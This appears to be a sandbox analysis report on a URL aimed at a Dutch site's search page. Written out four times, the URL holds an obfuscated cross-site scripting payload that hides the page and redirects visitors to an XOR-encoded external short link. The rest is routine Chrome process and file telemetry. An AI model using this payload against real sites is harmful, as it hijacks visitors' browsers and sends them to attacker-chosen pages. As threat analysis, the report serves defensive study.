hxxps://zorgselect[.]nl/zoeken?q=%22%3E%7CCryptography%20menu[.]get%3D~mime~%20%C2%A7intelligence[.]start(~dispatchEvent~)%20lib%20%C2%A7computing(~start~)[.]reality%20onUpdated%C2%A7%7C%20Blockchain%C2%A7%20gif~%20location[.]reload()%C2%A7%20web%22%20rsc%60%20door(%20remake%3D%20redo)%C2%A7%20onstart_%20attitudelocal_marine%C2%A7%20menu[.]get%3D%60mime%60%20library[.]start(%60await%60)%20lib%C2%A7%20process%C2%A7(%60start%60)[.]load%20arch[.]hand()%20folder[.]setElementByCode(%60socar%60)%C2%A7%20contact(%60r%60%2C%605%60)%20%C2%A7connect%3D%60hola%60[.]fix()%22%3E%3Ciframe%20src%3Djavascript%3A%2F*fd7%C2%A7ljj%5Bljj[.]attol1%5Dkhalfyacoleur%C2%A7blanch*%2FcodeString%3D%60win%60%2B%60dow[.]par%60%2B%60ent[.]docu%60%2B%60ment[.]docu%60%2B%60mentEle%60%2B%60ment[.]st%60%2B%60yle[.]opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C73%2C95%2C94%2C94%2C4%2C70%2C83%2C5%2C71%2C93%2C76%2C97%2C107%2C122%2C89%2C19%5D%3B%2F*that%5B~7el~%5D(setInterval%2C~_hara~)laard%C2%A73000zblaalo%C2%A73000zb*%2Fwin%60%2B%60dow[.]par%60%2B%60ent[.]loca%60%2B%60tion[.]hr%60%2B%60ef%3Durl[.]map(value%3D%60%2BString[.]fromCharCode(62)%2B%60String[.]fromCharCode(value%5E42))[.]jo%60%2B%60in(%27%27)%3B%2F*chw%C2%A7%C2%A7%C2%A7chw[.]toUpUpDown()*%2F%60%3BcodeString%3DcodeString[.]replaceAll(%60salooa%60%2C%60azefcr%60)%3BexecuteCode%3DFunction(codeString)%3B%2F*that%5B~ovrir~%5D(sessionStorage%2C~_selve~)sleep[.]over%C2%A7*%2FexecuteCode()%3B%2F*%C2%A7max[.]do()*%2F%3E%3C%2Fiframe%3E%3Cspan%20style%3D%60display%3Ablock%3Bposition%3Afixed%3Bz-index%3A997483649%3Btop%3A0%3Bleft%3A0%3Bwidth%3A2000px%3Bheight%3A2000px%3Bbackgroundcolor%3Awhite%3B~%3E%3C%2Fspan%3E%7CCryptography%20menu[.]get%3D~mime~%20%C2%A7intelligence[.]start(~dispatchEvent~)%20lib%20%C2%A7computing(~start~)[.]reality%20arch[.]learning()onUpdated%C2%A7%7C%20Blockchain%C2%A7%20gif~%20location[.]reload()%C2%A7%20web%22%20rsc%60%20door(%20remake%3D%20redo)%C2%A7%20onstart_%20attitudelocal_marine%C2%A7%20folder[.]setElementByCode(~socar~ar~)

Analysis

max time kernel
69s
max time network
74s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
23/08/2023, 10:51

Sharing

Behavioral task

behavioral1

Sample

https://zorgselect.nl/zoeken?q=%22%3E%7CCryptography%20menu.get%3D~mime~%20%C2%A7intelligence.start(~dispatchEvent~)%20lib%20%C2%A7computing(~start~).reality%20onUpdated%C2%A7%7C%20Blockchain%C2%A7%20gif~%20location.reload()%C2%A7%20web%22%20rsc%60%20door(%20remake%3D%20redo)%C2%A7%20onstart_%20attitudelocal_marine%C2%A7%20menu.get%3D%60mime%60%20library.start(%60await%60)%20lib%C2%A7%20process%C2%A7(%60start%60).load%20arch.hand()%20folder.setElementByCode(%60socar%60)%C2%A7%20contact(%60r%60%2C%605%60)%20%C2%A7connect%3D%60hola%60.fix()%22%3E%3Ciframe%20src%3Djavascript%3A%2F*fd7%C2%A7ljj%5Bljj.attol1%5Dkhalfyacoleur%C2%A7blanch*%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C73%2C95%2C94%2C94%2C4%2C70%2C83%2C5%2C71%2C93%2C76%2C97%2C107%2C122%2C89%2C19%5D%3B%2F*that%5B~7el~%5D(setInterval%2C~_hara~)laard%C2%A73000zblaalo%C2%A73000zb*%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map(value%3D%60%2BString.fromCharCode(62)%2B%60String.fromCharCode(value%5E42)).jo%60%2B%60in(%27%27)%3B%2F*chw%C2%A7%C2%A7%C2%A7chw.toUpUpDown()*%2F%60%3BcodeString%3DcodeString.replaceAll(%60salooa%60%2C%60azefcr%60)%3BexecuteCode%3DFunction(codeString)%3B%2F*that%5B~ovrir~%5D(sessionStorage%2C~_selve~)sleep.over%C2%A7*%2FexecuteCode()%3B%2F*%C2%A7max.do()*%2F%3E%3C%2Fiframe%3E%3Cspan%20style%3D%60display%3Ablock%3Bposition%3Afixed%3Bz-index%3A997483649%3Btop%3A0%3Bleft%3A0%3Bwidth%3A2000px%3Bheight%3A2000px%3Bbackgroundcolor%3Awhite%3B~%3E%3C%2Fspan%3E%7CCryptography%20menu.get%3D~mime~%20%C2%A7intelligence.start(~dispatchEvent~)%20lib%20%C2%A7computing(~start~).reality%20arch.learning()onUpdated%C2%A7%7C%20Blockchain%C2%A7%20gif~%20location.reload()%C2%A7%20web%22%20rsc%60%20door(%20remake%3D%20redo)%C2%A7%20onstart_%20attitudelocal_marine%C2%A7%20folder.setElementByCode(~socar~ar~)

Resource

win10v2004-20230703-en

windows10-2004-x64

7 signatures

150 seconds

Report Analysis Logs

General

Target

https://zorgselect.nl/zoeken?q=%22%3E%7CCryptography%20menu.get%3D~mime~%20%C2%A7intelligence.start(~dispatchEvent~)%20lib%20%C2%A7computing(~start~).reality%20onUpdated%C2%A7%7C%20Blockchain%C2%A7%20gif~%20location.reload()%C2%A7%20web%22%20rsc%60%20door(%20remake%3D%20redo)%C2%A7%20onstart_%20attitudelocal_marine%C2%A7%20menu.get%3D%60mime%60%20library.start(%60await%60)%20lib%C2%A7%20process%C2%A7(%60start%60).load%20arch.hand()%20folder.setElementByCode(%60socar%60)%C2%A7%20contact(%60r%60%2C%605%60)%20%C2%A7connect%3D%60hola%60.fix()%22%3E%3Ciframe%20src%3Djavascript%3A%2F*fd7%C2%A7ljj%5Bljj.attol1%5Dkhalfyacoleur%C2%A7blanch*%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C73%2C95%2C94%2C94%2C4%2C70%2C83%2C5%2C71%2C93%2C76%2C97%2C107%2C122%2C89%2C19%5D%3B%2F*that%5B~7el~%5D(setInterval%2C~_hara~)laard%C2%A73000zblaalo%C2%A73000zb*%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map(value%3D%60%2BString.fromCharCode(62)%2B%60String.fromCharCode(value%5E42)).jo%60%2B%60in(%27%27)%3B%2F*chw%C2%A7%C2%A7%C2%A7chw.toUpUpDown()*%2F%60%3BcodeString%3DcodeString.replaceAll(%60salooa%60%2C%60azefcr%60)%3BexecuteCode%3DFunction(codeString)%3B%2F*that%5B~ovrir~%5D(sessionStorage%2C~_selve~)sleep.over%C2%A7*%2FexecuteCode()%3B%2F*%C2%A7max.do()*%2F%3E%3C%2Fiframe%3E%3Cspan%20style%3D%60display%3Ablock%3Bposition%3Afixed%3Bz-index%3A997483649%3Btop%3A0%3Bleft%3A0%3Bwidth%3A2000px%3Bheight%3A2000px%3Bbackgroundcolor%3Awhite%3B~%3E%3C%2Fspan%3E%7CCryptography%20menu.get%3D~mime~%20%C2%A7intelligence.start(~dispatchEvent~)%20lib%20%C2%A7computing(~start~).reality%20arch.learning()onUpdated%C2%A7%7C%20Blockchain%C2%A7%20gif~%20location.reload()%C2%A7%20web%22%20rsc%60%20door(%20remake%3D%20redo)%C2%A7%20onstart_%20attitudelocal_marine%C2%A7%20folder.setElementByCode(~socar~ar~)

Score

1^/10

Malware Config

Signatures

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133372615178737900"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4796	chrome.exe
4796	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
4796	chrome.exe
4796	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe
Token: SeShutdownPrivilege	4796	chrome.exe
Token: SeCreatePagefilePrivilege	4796	chrome.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe
4796	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4796 wrote to memory of 2920	4796	chrome.exe	54
PID 4796 wrote to memory of 2920	4796	chrome.exe	54
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 704	4796	chrome.exe	83
PID 4796 wrote to memory of 1528	4796	chrome.exe	84
PID 4796 wrote to memory of 1528	4796	chrome.exe	84
PID 4796 wrote to memory of 2296	4796	chrome.exe	85
PID 4796 wrote to memory of 2296	4796	chrome.exe	85
PID 4796 wrote to memory of 2296	4796	chrome.exe	85
PID 4796 wrote to memory of 2296	4796	chrome.exe	85
PID 4796 wrote to memory of 2296	4796	chrome.exe	85
PID 4796 wrote to memory of 2296	4796	chrome.exe	85
PID 4796 wrote to memory of 2296	4796	chrome.exe	85
PID 4796 wrote to memory of 2296	4796	chrome.exe	85
PID 4796 wrote to memory of 2296	4796	chrome.exe	85
PID 4796 wrote to memory of 2296	4796	chrome.exe	85
PID 4796 wrote to memory of 2296	4796	chrome.exe	85
PID 4796 wrote to memory of 2296	4796	chrome.exe	85
PID 4796 wrote to memory of 2296	4796	chrome.exe	85
PID 4796 wrote to memory of 2296	4796	chrome.exe	85
PID 4796 wrote to memory of 2296	4796	chrome.exe	85
PID 4796 wrote to memory of 2296	4796	chrome.exe	85
PID 4796 wrote to memory of 2296	4796	chrome.exe	85
PID 4796 wrote to memory of 2296	4796	chrome.exe	85
PID 4796 wrote to memory of 2296	4796	chrome.exe	85
PID 4796 wrote to memory of 2296	4796	chrome.exe	85
PID 4796 wrote to memory of 2296	4796	chrome.exe	85
PID 4796 wrote to memory of 2296	4796	chrome.exe	85

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://zorgselect.nl/zoeken?q=%22%3E%7CCryptography%20menu.get%3D~mime~%20%C2%A7intelligence.start(~dispatchEvent~)%20lib%20%C2%A7computing(~start~).reality%20onUpdated%C2%A7%7C%20Blockchain%C2%A7%20gif~%20location.reload()%C2%A7%20web%22%20rsc%60%20door(%20remake%3D%20redo)%C2%A7%20onstart_%20attitudelocal_marine%C2%A7%20menu.get%3D%60mime%60%20library.start(%60await%60)%20lib%C2%A7%20process%C2%A7(%60start%60).load%20arch.hand()%20folder.setElementByCode(%60socar%60)%C2%A7%20contact(%60r%60%2C%605%60)%20%C2%A7connect%3D%60hola%60.fix()%22%3E%3Ciframe%20src%3Djavascript%3A%2F*fd7%C2%A7ljj%5Bljj.attol1%5Dkhalfyacoleur%C2%A7blanch*%2FcodeString%3D%60win%60%2B%60dow.par%60%2B%60ent.docu%60%2B%60ment.docu%60%2B%60mentEle%60%2B%60ment.st%60%2B%60yle.opa%60%2B%60city%3D0%3Burl%3D%5B66%2C94%2C94%2C90%2C89%2C16%2C5%2C5%2C73%2C95%2C94%2C94%2C4%2C70%2C83%2C5%2C71%2C93%2C76%2C97%2C107%2C122%2C89%2C19%5D%3B%2F*that%5B~7el~%5D(setInterval%2C~_hara~)laard%C2%A73000zblaalo%C2%A73000zb*%2Fwin%60%2B%60dow.par%60%2B%60ent.loca%60%2B%60tion.hr%60%2B%60ef%3Durl.map(value%3D%60%2BString.fromCharCode(62)%2B%60String.fromCharCode(value%5E42)).jo%60%2B%60in(%27%27)%3B%2F*chw%C2%A7%C2%A7%C2%A7chw.toUpUpDown()*%2F%60%3BcodeString%3DcodeString.replaceAll(%60salooa%60%2C%60azefcr%60)%3BexecuteCode%3DFunction(codeString)%3B%2F*that%5B~ovrir~%5D(sessionStorage%2C~_selve~)sleep.over%C2%A7*%2FexecuteCode()%3B%2F*%C2%A7max.do()*%2F%3E%3C%2Fiframe%3E%3Cspan%20style%3D%60display%3Ablock%3Bposition%3Afixed%3Bz-index%3A997483649%3Btop%3A0%3Bleft%3A0%3Bwidth%3A2000px%3Bheight%3A2000px%3Bbackgroundcolor%3Awhite%3B~%3E%3C%2Fspan%3E%7CCryptography%20menu.get%3D~mime~%20%C2%A7intelligence.start(~dispatchEvent~)%20lib%20%C2%A7computing(~start~).reality%20arch.learning()onUpdated%C2%A7%7C%20Blockchain%C2%A7%20gif~%20location.reload()%C2%A7%20web%22%20rsc%60%20door(%20remake%3D%20redo)%C2%A7%20onstart_%20attitudelocal_marine%C2%A7%20folder.setElementByCode(~socar~ar~)
1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb631e9758,0x7ffb631e9768,0x7ffb631e9778
  2⤵
  PID:2920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1668 --field-trial-handle=1248,i,3450918255465454665,716253681138883168,131072 /prefetch:2
  2⤵
  PID:704
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=1248,i,3450918255465454665,716253681138883168,131072 /prefetch:8
  2⤵
  PID:1528
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2204 --field-trial-handle=1248,i,3450918255465454665,716253681138883168,131072 /prefetch:8
  2⤵
  PID:2296
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2980 --field-trial-handle=1248,i,3450918255465454665,716253681138883168,131072 /prefetch:1
  2⤵
  PID:3416
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2992 --field-trial-handle=1248,i,3450918255465454665,716253681138883168,131072 /prefetch:1
  2⤵
  PID:232
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3796 --field-trial-handle=1248,i,3450918255465454665,716253681138883168,131072 /prefetch:8
  2⤵
  PID:1944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5408 --field-trial-handle=1248,i,3450918255465454665,716253681138883168,131072 /prefetch:8
  2⤵
  PID:1996

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:912

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
576B

MD5
1b3e28adf01fa570c7cc66b8579fc42f

SHA1
57b6204f4d0d316abfdb3be5283514aa65bd5c1d

SHA256
cf90172bb0636421c4618754650e4a2258f4ccc0ba28de151d7d4105b53dddd5

SHA512
81b74c65bfbc258d3333cafa9d7ffee9beb337f107e633614292bb559e1004170c22a826704c84879523cd6f8ee3aae119f1928f61a9c0175ae765620ee4769c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
3KB

MD5
d1d2428ae4f71b3b40e35418961d7254

SHA1
2fbacffaf9f3f79c05baedb026c21b0dbb161be8

SHA256
d563d8e1609fd9cd0c788e2e8efdd34c3ab496f9aae3fb8453fc3be275397436

SHA512
e94a8d1e3a9d76e0b03a60c0f5f72ab7640e1ac82bf9693ac0c3263a3b58d3bf9e702447c7aabdfdbad075a123c5ab3697564c4a4497f7dde2d10d3f2d1a7e1f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
2KB

MD5
71a8e732d722e18f6815b3050c44de84

SHA1
0081cef6e82646dc99035351a0bf16fc234c6391

SHA256
9a5c336ea057d15ee45b8253be676e1cf64b994adf5d202c58fd009643137627

SHA512
7fc128f8049ff54d956071e6cb24a988e3d3f6bb416d4f5e70e67de7a1361f0494ce6ef8ca082a886f4a5ca146749e41cdff31d3bc258252bc0fc79b6036b9f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
a5f03b05f097cfaa1337afd221337f46

SHA1
8a60fc851e0f2ffa2e4a4deebea8f51c642728cb

SHA256
77abc88015f8ca0465c2a4644834b64c27c1a0347e57e6c0c29cb60e8cc11669

SHA512
9c4f3c2cfebe13645624515aca34693f8010dd6fd040fa0c71c485294dd2c1695a248fb4234869e0b9a2466d154ece64a77f27fa9d965b751bd7881cb65d4a38

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
10f849c6758e89d6742e236f04dc2921

SHA1
41d1a60dbaac5672c97d582949e0373552ea771e

SHA256
bd447e1d5c7698b8989991b5db3f4337347a41b6c44046118c5a7280993b0390

SHA512
394950b456d5ca00a45a27ad75812cab6932ed9b6ff3b7d80a176e1598024c96aac5cc67c4046f87e876b1a06a08232d753ea768b9b0d64016386476fa8d96aa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
4ed5331e3e4ec9388a1159897ce9c312

SHA1
ae2a35afcb20d925646b243ad97d21ac067dc751

SHA256
ae8e39d0706b48d50f6752921e808dea3a31af14aed8fea087acc0cb804995e7

SHA512
c181568ccee62c46d3906360c24453650f334db3bc9a22e0d47e027cb111acc48f1f714e22c8adb208b200a4a5ec2e601e1ba2b5f82560ac97ccee0318747a2a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
87KB

MD5
8a9842aaf5a2afd5cb6b6ded40128e3e

SHA1
ab03fc38125cf7c80a947d5320f6652cf4d12333

SHA256
265812226a9c11ed98264bf0d53289d499f5a6fa41699b2fd6920439a9a4ffe0

SHA512
e795f7857bc8dd444f8262bf07446e9164d68d3a6545d3ce73881cfea3bd902412fcd7dc6a3a1e8b924e03d50a2ae8571d32eab411e2cf68ad9ffa62a5fc3d5d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
87KB

MD5
120a742223fb7f5fe30bf89ff272585e

SHA1
6f977180ab3e891568e7603349375eec4ebe3ac1

SHA256
d7fee005438c704d039759e50b7c1b58b23d781cb09a1a1395465ccf62f80983

SHA512
f8016768173fa843ba01c3233d2858bb3f53b08676a1798687c7687df3fb6fb26e6691cae08877f0fec9dac5c71c09173e8233f17faaf1828f7141a1f7126a2a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

Filesize
264KB

MD5
c79bf43636b287b53fd9cb8f8a72518c

SHA1
1fbe80ce2b61580ed1df37b110305002195135c0

SHA256
427656e0147cb1ce5500c274991942d3ac40ce3731f9a2d108b9d534cf3c901c

SHA512
51c356fc58b85e18a42702fefa3e555b4e0dd36c2a19c615cce43d0ea02b507015969ad37fd30af0b18bb79c07110d04af857f106a03f515a03aa4b32000f8ae

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit